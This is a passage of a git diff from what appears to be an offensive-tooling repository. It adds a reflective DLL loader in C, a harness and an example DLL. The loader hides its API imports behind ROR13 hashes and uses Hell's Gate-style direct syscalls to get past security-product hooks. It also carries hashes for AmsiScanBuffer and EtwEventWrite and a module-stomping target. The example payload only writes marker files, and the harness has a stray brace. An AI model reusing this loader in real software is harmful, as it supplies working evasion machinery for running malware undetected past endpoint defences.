FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); + if (h == INVALID_HANDLE_VALUE) + return NULL; + + DWORD sz = GetFileSize(h, NULL); + uint8_t *b = (uint8_t *)HeapAlloc(GetProcessHeap(), 0, sz); + DWORD rd; + ReadFile(h, b, sz, &rd, NULL); + CloseHandle(h); + *out = sz; + return b; +} + +int main(int argc, char **argv) +{ + const char *path = argc > 1 ? argv[1] : "build\\example.dll"; + + printf("[*] reading %s\n", path); + buf = read_file(path, &bufsz); + if (!buf) + { + fprintf(stderr, "[!] read failed %lu\n", GetLastError()); + return 1; + } + printf("[+] %zu bytes\n", bufsz); + + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)buf; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(buf + dos->e_lfanew); + printf("[+] ImageBase=0x%llx SizeOfImage=0x%lx SizeOfHeaders=0x%lx\n", + (unsigned long long)nt->OptionalHeader.ImageBase, + (unsigned long)nt->OptionalHeader.SizeOfImage, + (unsigned long)nt->OptionalHeader.SizeOfHeaders); + + // STEP 1: find ReflectiveLoader export in the raw file + DWORD expRva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; + DWORD expOff = rva2off(expRva); + if (!expOff) + { + fprintf(stderr, "[!] no export dir\n"); + return 1; + } + + IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *)(buf + expOff); + DWORD *names = (DWORD *)(buf + rva2off(exp->AddressOfNames)); + WORD *ords = (WORD *)(buf + rva2off(exp->AddressOfNameOrdinals)); + DWORD *funcs = (DWORD *)(buf + rva2off(exp->AddressOfFunctions)); + + DWORD rl_rva = 0; + for (DWORD i = 0; i < exp->NumberOfNames; i++) + { + const char *n = (const char *)(buf + rva2off(names[i])); + if (strcmp(n, "ReflectiveLoader") == 0) + { + rl_rva = funcs[ords[i]]; + break; + } + } + + DWORD rl_off = rva2off(rl_rva); + printf("[+] ReflectiveLoader: RVA=0x%lx rawOff=0x%lx\n", (unsigned long)rl_rva, (unsigned long)rl_off); + + // STEP 2: copy the raw DLL into RWX memory + uint8_t *mem = (uint8_t *)VirtualAlloc(NULL, bufsz, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + memcpy(mem, buf, bufsz); + printf("[+] raw copy at %p\n", (void *)mem); + + // STEP 3: print section info + printf("[*] sections:\n"); + IMAGE_NT_HEADERS *mnt = (IMAGE_NT_HEADERS *)(mem + dos->e_lfanew); + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(mnt); + for (WORD i = 0; i < mnt->FileHeader.NumberOfSections; i++, sec++) + { + char name[9] = {0}; + memcpy(name, sec->Name, 8); + printf(" [%d] %-8s VA=0x%08lx raw=0x%08lx sz=0x%lx\n", i, name, + (unsigned long)sec->VirtualAddress, + (unsigned long)sec->PointerToRawData, + (unsigned long)sec->SizeOfRawData); + } + + // STEP 4: simulate finding the module base from the function address + ULONG_PTR fn_addr = (ULONG_PTR)(mem + rl_off); + ULONG_PTR scan = fn_addr & ~0xFFFUL; + int found_mz = 0; + ULONG_PTR found_base = 0; + for (int i = 0; i < 4096; i++, scan -= 0x1000) + { + if (!IsBadReadPtr((void *)scan, 2) && *(WORD *)scan == 0x5A4D) + { + IMAGE_DOS_HEADER *d = (IMAGE_DOS_HEADER *)scan; + if ((ULONG_PTR)d->e_lfanew <= 0x400) + { + IMAGE_NT_HEADERS *n2 = (IMAGE_NT_HEADERS *)(scan + d->e_lfanew); + if (n2->Signature == 0x00004550 && n2->OptionalHeader.SizeOfImage > 0) + { + found_base = scan; + found_mz = 1; + break; + } + } + } + } + printf("[+] _rl_find_own_base scan: found=%d base=0x%llx expected=0x%llx %s\n", + found_mz, + (unsigned long long)found_base, + (unsigned long long)(uintptr_t)mem, + (found_base == (ULONG_PTR)mem) ? "OK" : "MISMATCH"); + + // STEP 5: allocate memory for the mapped image + DWORD imgSz = nt->OptionalHeader.SizeOfImage; + uint8_t *dst = (uint8_t *)VirtualAlloc(NULL, imgSz, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + printf("[+] dst alloc: %p (0x%lx bytes)\n", (void *)dst, (unsigned long)imgSz); + + // STEP 6: copy headers from the raw file to the mapped image + memcpy(dst, mem, nt->OptionalHeader.SizeOfHeaders); + printf("[+] headers copied\n"); + + // STEP 7: copy each section from raw file to its virtual address + IMAGE_NT_HEADERS *snt = (IMAGE_NT_HEADERS *)(mem + dos->e_lfanew); + sec = IMAGE_FIRST_SECTION(snt); + for (WORD i = 0; i < snt->FileHeader.NumberOfSections; i++, sec++) + { + if (!sec->PointerToRawData || !sec->SizeOfRawData) + continue; + uint8_t *ss = mem + sec->PointerToRawData; + uint8_t *dd = dst + sec->VirtualAddress; + if (sec->VirtualAddress + sec->SizeOfRawData > imgSz) + { + printf("[!] sec[%d] out of bounds!\n", i); + continue; + } + memcpy(dd, ss, sec->SizeOfRawData); + } + printf("[+] sections copied\n"); + + // STEP 8: apply relocations if needed + IMAGE_NT_HEADERS *dnt = (IMAGE_NT_HEADERS *)(dst + dos->e_lfanew); + LONG_PTR delta = (LONG_PTR)((uintptr_t)dst - nt->OptionalHeader.ImageBase); + printf("[*] reloc delta=0x%llx\n", (long long)delta); + { + DWORD rv = dnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; + DWORD rs = dnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + printf("[*] reloc dir RVA=0x%lx sz=0x%lx\n", (unsigned long)rv, (unsigned long)rs); + if (delta && rv && rs) + { + IMAGE_BASE_RELOCATION *r = (IMAGE_BASE_RELOCATION *)(dst + rv); + int cnt = 0; + while (r->VirtualAddress && r->SizeOfBlock) + { + ULONG_PTR pg = (ULONG_PTR)dst + r->VirtualAddress; + WORD *e = (WORD *)((uint8_t *)r + sizeof(*r)); + DWORD n = (r->SizeOfBlock - sizeof(*r)) / sizeof(WORD); + for (DWORD j = 0; j < n; j++) + { + int t = e[j] >> 12; + DWORD o = e[j] & 0xFFF; + if (t == IMAGE_REL_BASED_DIR64) + { + *(ULONG_PTR *)(pg + o) += (ULONG_PTR)delta; + cnt++; + } + if (t == IMAGE_REL_BASED_HIGHLOW) + { + *(DWORD *)(pg + o) += (DWORD)delta; + cnt++; + } + } + r = (IMAGE_BASE_RELOCATION *)((uint8_t *)r + r->SizeOfBlock); + } + printf("[+] %d relocations applied\n", cnt); + } + } + + // STEP 9: resolve imports for the mapped image + { + DWORD iv = dnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + printf("[*] import dir RVA=0x%lx\n", (unsigned long)iv); + if (iv) + { + IMAGE_IMPORT_DESCRIPTOR *imp = (IMAGE_IMPORT_DESCRIPTOR *)(dst + iv); + for (; imp->Name; imp++) + { + char *dn = (char *)(dst + imp->Name); + HMODULE h = LoadLibraryA(dn); + printf(" [%s] -> %p\n", dn, (void *)h); + if (!h) + continue; + IMAGE_THUNK_DATA *iat = (IMAGE_THUNK_DATA *)(dst + imp->FirstThunk); + IMAGE_THUNK_DATA *ont = imp->OriginalFirstThunk ? (IMAGE_THUNK_DATA *)(dst + imp->OriginalFirstThunk) : iat; + for (; ont->u1.AddressOfData; ont++, iat++) + { + FARPROC p; + if (IMAGE_SNAP_BY_ORDINAL(ont->u1.Ordinal)) + p = GetProcAddress(h, (LPCSTR)IMAGE_ORDINAL(ont->u1.Ordinal)); + else + { + IMAGE_IMPORT_BY_NAME *ibn = (IMAGE_IMPORT_BY_NAME *)(dst + (DWORD)ont->u1.AddressOfData); + p = GetProcAddress(h, (LPCSTR)ibn->Name); + } + iat->u1.Function = (ULONG_PTR)p; + } + } + } + } + printf("[+] imports resolved\n"); + + // STEP 10: flush cache and call the DLL entry point + FlushInstructionCache(GetCurrentProcess(), dst, imgSz); + typedef BOOL(WINAPI *DllMain_t)(HINSTANCE, DWORD, LPVOID); + DllMain_t fm = (DllMain_t)(dst + dnt->OptionalHeader.AddressOfEntryPoint); + printf("[*] calling DllMain at %p (OEP RVA=0x%lx)\n", (void *)fm, + (unsigned long)dnt->OptionalHeader.AddressOfEntryPoint); + BOOL ok = fm((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL); + printf("[+] DllMain returned %d\n", (int)ok); +} + + /* verify marker */ + char marker[MAX_PATH]; + DWORD n=GetEnvironmentVariableA("TEMP",marker,MAX_PATH-20); + if(n){const char*s="\\reflect_demo.txt";for(int i=0;s[i];i++)marker[n++]=s[i];marker[n]=0; + if(GetFileAttributesA(marker)!=INVALID_FILE_ATTRIBUTES)printf("[+] marker: %s\n",marker); + else printf("[-] no marker file\n");} + + VirtualFree(dst,0,MEM_RELEASE); + VirtualFree(mem,0,MEM_RELEASE); + HeapFree(GetProcessHeap(),0,buf); + return 0; +} diff --git a/techniques/reflect-dll/src/example_dll.c b/techniques/reflect-dll/src/example_dll.c new file mode 100644 index 0000000..1f09c82 --- /dev/null +++ b/techniques/reflect-dll/src/example_dll.c @@ -0,0 +1,75 @@ +// Minimal example DLL for reflective loading. +// Build this with reflect.c and export ReflectiveLoader. + +#include + +// TLS callback — called by ReflectiveLoader BEFORE DllMain. +// Writes %TEMP%\reflect_tls.txt to prove the callback ran. +static void NTAPI tls_callback(PVOID DllHandle, DWORD reason, PVOID reserved) +{ + (void)DllHandle; + (void)reserved; + if (reason != DLL_PROCESS_ATTACH) + return; + + OutputDebugStringA("[reflect-dll] TLS callback DLL_PROCESS_ATTACH\n"); + + char path[MAX_PATH]; + DWORD n = GetEnvironmentVariableA("TEMP", path, MAX_PATH - 20); + if (n && n < MAX_PATH - 20) + { + const char *suffix = "\\reflect_tls.txt"; + for (int i = 0; suffix[i]; i++) + path[n++] = suffix[i]; + path[n] = '\0'; + HANDLE hf = CreateFileA(path, GENERIC_WRITE, 0, NULL, + CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hf != INVALID_HANDLE_VALUE) + { + const char msg[] = "TLS callback fired before DllMain\r\n"; + DWORD w; + WriteFile(hf, msg, sizeof(msg) - 1, &w, NULL); + CloseHandle(hf); + } + } +} + +static __thread volatile int _tls_anchor = 0; +__attribute__((section(".CRT$XLB"), used)) static PIMAGE_TLS_CALLBACK _tls_cb_entry = tls_callback; + +__declspec(dllexport) +BOOL WINAPI +DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved) +{ + (void)hInst; + (void)reserved; + + // only perform actions on process attach + if (reason == DLL_PROCESS_ATTACH) + { + DisableThreadLibraryCalls(hInst); + + OutputDebugStringA("[reflect-dll] DllMain DLL_PROCESS_ATTACH loaded reflectively\n"); + + char path[MAX_PATH]; + DWORD n = GetEnvironmentVariableA("TEMP", path, MAX_PATH - 20); + if (n && n < MAX_PATH - 20) + { + const char *suffix = "\\reflect_demo.txt"; + for (int i = 0; suffix[i]; i++) + path[n++] = suffix[i]; + path[n] = '\0'; + + HANDLE hf = CreateFileA(path, GENERIC_WRITE, 0, NULL, + CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hf != INVALID_HANDLE_VALUE) + { + const char msg[] = "Reflective DLL loaded via ReflectiveLoader()\r\n"; + DWORD written; + WriteFile(hf, msg, sizeof(msg) - 1, &written, NULL); + CloseHandle(hf); + } + } + } + return TRUE; +} diff --git a/techniques/reflect-dll/src/reflect.c b/techniques/reflect-dll/src/reflect.c new file mode 100644 index 0000000..73d0180 --- /dev/null +++ b/techniques/reflect-dll/src/reflect.c @@ -0,0 +1,520 @@ +#include "reflect.h" +#include +#include +#include +#include + +// forward decl to silence MinGW warning +BOOL WINAPI DllMain(HINSTANCE, DWORD, LPVOID); + +// PEB/LDR structs + +typedef struct _RL_LDR_ENTRY { + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; +} RL_LDR_ENTRY; + +typedef struct _RL_PEB_LDR { + ULONG Length; + BOOLEAN Initialized; + PVOID SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; +} RL_PEB_LDR; + +typedef struct _RL_PEB { + BYTE Reserved[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + RL_PEB_LDR *Ldr; +} RL_PEB; + +// fn pointer typedefs + +typedef HMODULE (WINAPI *pLoadLibraryA_t) (LPCSTR); +typedef HMODULE (WINAPI *pLoadLibraryExA_t) (LPCSTR, HANDLE, DWORD); +typedef FARPROC (WINAPI *pGetProcAddress_t) (HMODULE, LPCSTR); +typedef LPVOID (WINAPI *pVirtualAlloc_t) (LPVOID, SIZE_T, DWORD, DWORD); +typedef BOOL (WINAPI *pVirtualProtect_t) (LPVOID, SIZE_T, DWORD, PDWORD); +typedef BOOL (WINAPI *pFlushInstructionCache_t) (HANDLE, LPCVOID, SIZE_T); +typedef HANDLE (WINAPI *pGetCurrentProcess_t) (void); +typedef BOOL (WINAPI *pDllMain_t) (HINSTANCE, DWORD, LPVOID); +typedef LONG (WINAPI *pNtAllocVm_t) (HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG); +typedef LONG (WINAPI *pNtProtectVm_t) (HANDLE, PVOID*, PSIZE_T, ULONG, PULONG); +typedef BOOLEAN (WINAPI *pRtlAddFunctionTable_t) (PRUNTIME_FUNCTION, DWORD, DWORD64); + +// ROR13+additive hashes - generated by tools/gen_hashes.py +// kernel32 +#define H_LoadLibraryA 0x8A8B4676UL +#define H_LoadLibraryExA 0xA5919EE3UL +#define H_GetProcAddress 0x1ACAEE7AUL +#define H_VirtualAlloc 0x302EBE1CUL +#define H_FlushInstructionCache 0xD9303A47UL +#define H_GetCurrentProcess 0x1A4B89AAUL +// ntdll +#define H_NtAllocateVirtualMemory 0x5947FD91UL +#define H_NtProtectVirtualMemory 0x1255C05BUL +#define H_RtlAddFunctionTable 0xB11A8928UL +#define H_EtwEventWrite 0xBE87B7B5UL +// amsi.dll +#define H_AmsiScanBuffer 0x338E06F6UL + +// stomp target - must have SizeOfImage >= ours +#define STOMP_DLL "C:\\Windows\\System32\\clbcatq.dll" + +// debug telemetry, exported +typedef struct { WORD ssn_alloc; WORD ssn_protect; DWORD alloc_method; } RL_DBG; +#define RL_DBG_HELLSGATE 1u +#define RL_DBG_VIRTALLOC 2u +__declspec(dllexport) volatile RL_DBG _rl_dbg = {0xFFFF, 0xFFFF, 0}; + +// ROR13+additive hash, input uppercased +static DWORD _rl_hash(const char *s) +{ + DWORD h = 0; + while (*s) { + unsigned char c = (unsigned char)*s++; + if (c >= 'a') c -= 0x20; + h = (h >> 13) | (h << 19); // ROR13 + h += c; + } + return h; +} + +// wide vs narrow case-insensitive compare, up to 12 chars +static int _rl_weq12(const WCHAR *w, const char *s) +{ + for (int i = 0; i < 12; i++) { + if (!w[i] && !s[i]) return 1; + if (!w[i] || !s[i]) return 0; + if ((w[i] | 0x20) != ((unsigned char)s[i] | 0x20)) return 0; + } + return 1; // full 12-char match (e.g. "kernel32.dll") +} + +// walk PEB module list, return kernel32 base +static ULONG_PTR _rl_find_kernel32(void) +{ +#ifdef _WIN64 + RL_PEB *peb = (RL_PEB *)__readgsqword(0x60); +#else + RL_PEB *peb = (RL_PEB *)__readfsdword(0x30); +#endif + PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList; + PLIST_ENTRY cur = head->Flink; + while (cur != head) { + RL_LDR_ENTRY *e = CONTAINING_RECORD(cur, RL_LDR_ENTRY, InMemoryOrderLinks); + if (e->BaseDllName.Length >= 24 && _rl_weq12(e->BaseDllName.Buffer, "kernel32.dll")) + return (ULONG_PTR)e->DllBase; + cur = cur->Flink; + } + return 0; +} + +// walk PEB module list, return ntdll base +static ULONG_PTR _rl_find_ntdll(void) +{ +#ifdef _WIN64 + RL_PEB *peb = (RL_PEB *)__readgsqword(0x60); +#else + RL_PEB *peb = (RL_PEB *)__readfsdword(0x30); +#endif + PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList; + PLIST_ENTRY cur = head->Flink; + while (cur != head) { + RL_LDR_ENTRY *e = CONTAINING_RECORD(cur, RL_LDR_ENTRY, InMemoryOrderLinks); + if (e->BaseDllName.Length >= 18 && _rl_weq12(e->BaseDllName.Buffer, "ntdll.dll\0\0\0")) + return (ULONG_PTR)e->DllBase; + cur = cur->Flink; + } + return 0; +} + +// EAT walk by hash - ignores forwarded exports +static ULONG_PTR _rl_get_proc_h(ULONG_PTR mod, DWORD hash) +{ + PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)mod; + PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(mod + dos->e_lfanew); + DWORD expRva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; + DWORD expSz = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; + if (!expRva) return 0; + PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(mod + expRva); + DWORD *names = (DWORD *)(mod + exp->AddressOfNames); + WORD *ords = (WORD *)(mod + exp->AddressOfNameOrdinals); + DWORD *funcs = (DWORD *)(mod + exp->AddressOfFunctions); + for (DWORD i = 0; i < exp->NumberOfNames; i++) { + if (_rl_hash((char *)(mod + names[i])) == hash) { + DWORD fnRva = funcs[ords[i]]; + if (fnRva >= expRva && fnRva < expRva + expSz) return 0; // forwarded, skip + return mod + fnRva; + } + } + return 0; +} + +// get SSN from ntdll stub (Hell's Gate / Halos Gate / Tartarus Gate) +static WORD _rl_ssn(ULONG_PTR ntdll, DWORD hash) +{ + ULONG_PTR stub = _rl_get_proc_h(ntdll, hash); + if (!stub) return 0xFFFF; + uint8_t *p = (uint8_t *)stub; + + // clean stub - read SSN from bytes 4-5 + if (p[0]==0x4C && p[1]==0x8B && p[2]==0xD1 && p[3]==0xB8 && p[6]==0x00 && p[7]==0x00) + return *(WORD *)(p + 4); + + // hooked - find real stub stride by scanning backward + int stride = 0; + for (int s = 1; s <= 256 && !stride; s++) { + uint8_t *q = p - s; + if (q[0]==0x4C && q[1]==0x8B && q[2]==0xD1 && q[3]==0xB8 && q[6]==0x00 && q[7]==0x00) + stride = s; + } + if (!stride) { + for (int s = 1; s <= 256 && !stride; s++) { + uint8_t *q = p + s; + if (q[0]==0x4C && q[1]==0x8B && q[2]==0xD1 && q[3]==0xB8 && q[6]==0x00 && q[7]==0x00) + stride = s; + } + } + if (!stride) stride = 32; // typical Win10/11 stub size + + for (int d = 1; d <= 32; d++) { + uint8_t *n = p + d * stride; + if (n[0]==0x4C && n[1]==0x8B && n[2]==0xD1 && n[3]==0xB8 && n[6]==0x00 && n[7]==0x00) + return (WORD)(*(WORD *)(n + 4) - (WORD)d); + n = p - d * stride; + if (n[0]==0x4C && n[1]==0x8B && n[2]==0xD1 && n[3]==0xB8 && n[6]==0x00 && n[7]==0x00) + return (WORD)(*(WORD *)(n + 4) + (WORD)d); + } + return 0xFFFF; +} + +// must be in .data not .bss (no raw bytes on disk) +static volatile WORD _hg_ssn = 0xFFFF; + +// set _hg_ssn before calling +__attribute__((naked)) +static NTSTATUS _rl_hg_call(void) +{ + __asm__( + "movzwl _hg_ssn(%rip), %eax\n\t" + "movq %rcx, %r10\n\t" + "syscall\n\t" + "ret\n\t" + ); +} + +// scan backward from own RIP to find the MZ header of the raw DLL in memory +static ULONG_PTR _rl_find_own_base(void) +{ + ULONG_PTR ip = (ULONG_PTR)_rl_find_own_base & ~0xFFFUL; + for (int i = 0; i < 4096; i++, ip -= 0x1000) { + if (*(WORD *)ip != IMAGE_DOS_SIGNATURE) continue; + PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ip; + if ((ULONG_PTR)dos->e_lfanew > 0x400) continue; + PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(ip + dos->e_lfanew); + if (nt->Signature == IMAGE_NT_SIGNATURE && nt->OptionalHeader.SizeOfImage > 0) + return ip; + } + return 0; +} + +__declspec(dllexport) +ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter) +{ + (void)lpParameter; + + // 1. find kernel32 + ntdll via PEB walk + ULONG_PTR k32 = _rl_find_kernel32(); + ULONG_PTR ntdll = _rl_find_ntdll(); + if (!k32 || !ntdll) return 0; + + // 2. resolve APIs by hash - no plaintext strings + pLoadLibraryA_t fLLA = (pLoadLibraryA_t) _rl_get_proc_h(k32, H_LoadLibraryA); + pLoadLibraryExA_t fLLEA = (pLoadLibraryExA_t) _rl_get_proc_h(k32, H_LoadLibraryExA); + pGetProcAddress_t fGPA = (pGetProcAddress_t) _rl_get_proc_h(k32, H_GetProcAddress); + pVirtualAlloc_t fVA = (pVirtualAlloc_t) _rl_get_proc_h(k32, H_VirtualAlloc); + pFlushInstructionCache_t fFIC = (pFlushInstructionCache_t) _rl_get_proc_h(k32, H_FlushInstructionCache); + pGetCurrentProcess_t fGCP = (pGetCurrentProcess_t) _rl_get_proc_h(k32, H_GetCurrentProcess); + pRtlAddFunctionTable_t fRAFT = (pRtlAddFunctionTable_t) _rl_get_proc_h(ntdll, H_RtlAddFunctionTable); + + if (!fLLA || !fGPA || !fVA) return 0; + + // VirtualProtect is forwarded, EAT returns a string not a pointer + pVirtualProtect_t fVP = (pVirtualProtect_t)fGPA((HMODULE)k32, "VirtualProtect"); + + // 3. get syscall numbers for NtAllocate/NtProtect (bypasses ntdll hooks) + WORD ssn_alloc = _rl_ssn(ntdll, H_NtAllocateVirtualMemory); + WORD ssn_protect = _rl_ssn(ntdll, H_NtProtectVirtualMemory); + // save for telemetry + _rl_dbg.ssn_alloc = ssn_alloc; + _rl_dbg.ssn_protect = ssn_protect; + + // 4. locate raw PE + ULONG_PTR src = lpParameter ? (ULONG_PTR)lpParameter : _rl_find_own_base(); + if (!src) return 0; + + PIMAGE_DOS_HEADER srcDos = (PIMAGE_DOS_HEADER)src; + PIMAGE_NT_HEADERS srcNt = (PIMAGE_NT_HEADERS)(src + srcDos->e_lfanew); + DWORD imgSz = srcNt->OptionalHeader.SizeOfImage; + DWORD hdrSz = srcNt->OptionalHeader.SizeOfHeaders; + + // 5. allocate dst - priority: module stomp > NtAllocate syscall > VirtualAlloc + ULONG_PTR dst = 0; + + // (a) module stomping - disabled + // LoadLibraryExA(DONT_RESOLVE_DLL_REFERENCES) calls DllMain on Win10+ and hangs. + // Needs NtCreateSection + NtMapViewOfSection for a proper implementation. + (void)fLLEA; + + // (b) NtAllocateVirtualMemory syscall, try preferred base first + if (!dst && ssn_alloc != 0xFFFF) { + SIZE_T sz = (SIZE_T)imgSz; + PVOID base = (PVOID)srcNt->OptionalHeader.ImageBase; + _hg_ssn = ssn_alloc; + if (((pNtAllocVm_t)_rl_hg_call)((HANDLE)(LONG_PTR)-1, &base, 0, &sz, + MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) == 0) + dst = (ULONG_PTR)base; + if (!dst) { + base = NULL; sz = (SIZE_T)imgSz; + _hg_ssn = ssn_alloc; + if (((pNtAllocVm_t)_rl_hg_call)((HANDLE)(LONG_PTR)-1, &base, 0, &sz, + MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) == 0) + dst = (ULONG_PTR)base; + } + if (dst) _rl_dbg.alloc_method = RL_DBG_HELLSGATE; + } + + // (c) VirtualAlloc - plain fallback + if (!dst) + dst = (ULONG_PTR)fVA((LPVOID)srcNt->OptionalHeader.ImageBase, + imgSz, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!dst) + dst = (ULONG_PTR)fVA(NULL, imgSz, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!dst) return 0; + if (!_rl_dbg.alloc_method) _rl_dbg.alloc_method = RL_DBG_VIRTALLOC; + + // 6. copy headers + { uint8_t *s=(uint8_t*)src, *d=(uint8_t*)dst; for(DWORD i=0;iFileHeader.NumberOfSections; i++, sec++) { + if (!sec->PointerToRawData || !sec->SizeOfRawData) continue; + uint8_t *ss = (uint8_t *)(src + sec->PointerToRawData); + uint8_t *sd = (uint8_t *)(dst + sec->VirtualAddress); + for (DWORD j = 0; j < sec->SizeOfRawData; j++) sd[j] = ss[j]; + } + } + + PIMAGE_NT_HEADERS dstNt = (PIMAGE_NT_HEADERS)(dst + ((PIMAGE_DOS_HEADER)dst)->e_lfanew); + LONG_PTR delta = (LONG_PTR)(dst - srcNt->OptionalHeader.ImageBase); + + // 8. base relocations + { + DWORD relRva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; + DWORD relSz = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + if (delta && relRva && relSz) { + PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)(dst + relRva); + while (reloc->VirtualAddress && reloc->SizeOfBlock) { + ULONG_PTR page = dst + reloc->VirtualAddress; + WORD *entry = (WORD *)((uint8_t *)reloc + sizeof(IMAGE_BASE_RELOCATION)); + DWORD cnt = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); + for (DWORD i = 0; i < cnt; i++) { + int type = entry[i] >> 12; + DWORD off = entry[i] & 0x0FFF; +#ifdef _WIN64 + if (type == IMAGE_REL_BASED_DIR64) *(ULONG_PTR *)(page+off) += (ULONG_PTR)delta; +#endif + if (type == IMAGE_REL_BASED_HIGHLOW) *(DWORD *)(page+off) += (DWORD)delta; + } + reloc = (PIMAGE_BASE_RELOCATION)((uint8_t *)reloc + reloc->SizeOfBlock); + } + } + } + + // 9. imports + { + DWORD impRva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (impRva) { + PIMAGE_IMPORT_DESCRIPTOR imp = (PIMAGE_IMPORT_DESCRIPTOR)(dst + impRva); + for (; imp->Name; imp++) { + HMODULE hLib = fLLA((char *)(dst + imp->Name)); + if (!hLib) continue; + IMAGE_THUNK_DATA *iat = (IMAGE_THUNK_DATA *)(dst + imp->FirstThunk); + IMAGE_THUNK_DATA *ont = imp->OriginalFirstThunk + ? (IMAGE_THUNK_DATA *)(dst + imp->OriginalFirstThunk) : iat; + for (; ont->u1.AddressOfData; ont++, iat++) { + FARPROC proc; + if (IMAGE_SNAP_BY_ORDINAL(ont->u1.Ordinal)) + proc = fGPA(hLib, (LPCSTR)IMAGE_ORDINAL(ont->u1.Ordinal)); + else { + PIMAGE_IMPORT_BY_NAME ibn = + (PIMAGE_IMPORT_BY_NAME)(dst + (DWORD)ont->u1.AddressOfData); + proc = fGPA(hLib, (LPCSTR)ibn->Name); + } + iat->u1.Function = (ULONG_PTR)proc; + } + } + } + } + + // 10. per-section permissions + { + DWORD secAlign = dstNt->OptionalHeader.SectionAlignment; + PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(dstNt); + for (WORD i = 0; i < dstNt->FileHeader.NumberOfSections; i++, sec++) { + if (!sec->VirtualAddress) continue; + // round up to section alignment + DWORD vsz = sec->Misc.VirtualSize ? sec->Misc.VirtualSize : sec->SizeOfRawData; + DWORD msz = (vsz + secAlign - 1) & ~(secAlign - 1); + if (!msz) continue; + DWORD prot = PAGE_NOACCESS, c = sec->Characteristics; + if (c & IMAGE_SCN_MEM_EXECUTE) { + if (c & IMAGE_SCN_MEM_WRITE) prot = PAGE_EXECUTE_READWRITE; + else if (c & IMAGE_SCN_MEM_READ) prot = PAGE_EXECUTE_READ; + else prot = PAGE_EXECUTE; + } else if (c & IMAGE_SCN_MEM_READ) { + prot = (c & IMAGE_SCN_MEM_WRITE) ? PAGE_READWRITE : PAGE_READONLY; + } else if (c & IMAGE_SCN_MEM_WRITE) { + prot = PAGE_WRITECOPY; + } + if (ssn_protect != 0xFFFF) { + PVOID addr = (PVOID)(dst + sec->VirtualAddress); + SIZE_T sz = (SIZE_T)msz; + ULONG old = 0; + _hg_ssn = ssn_protect; + ((pNtProtectVm_t)_rl_hg_call)((HANDLE)(LONG_PTR)-1, &addr, &sz, prot, &old); + } else if (fVP) { + DWORD old; + fVP((LPVOID)(dst + sec->VirtualAddress), msz, prot, &old); + } + } + } + + // 11. register .pdata for x64 SEH + if (fRAFT) { + DWORD pdRva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress; + DWORD pdSz = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size; + if (pdRva && pdSz) + fRAFT((PRUNTIME_FUNCTION)(dst + pdRva), pdSz / sizeof(RUNTIME_FUNCTION), (DWORD64)dst); + } + + // 11b. init __security_cookie - /GS DLLs crash at function return without this + { + DWORD lcRva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].VirtualAddress; + if (lcRva) { + PIMAGE_LOAD_CONFIG_DIRECTORY64 lc = (PIMAGE_LOAD_CONFIG_DIRECTORY64)(dst + lcRva); + if (lc->Size >= (DWORD)((ULONG_PTR)&lc->SecurityCookie - (ULONG_PTR)lc + sizeof(lc->SecurityCookie)) + && lc->SecurityCookie) { + ULONG_PTR *ck = (ULONG_PTR *)lc->SecurityCookie; + ULONG_PTR seed = (ULONG_PTR)ck ^ (ULONG_PTR)dst ^ (ULONG_PTR)lc; + seed ^= (seed >> 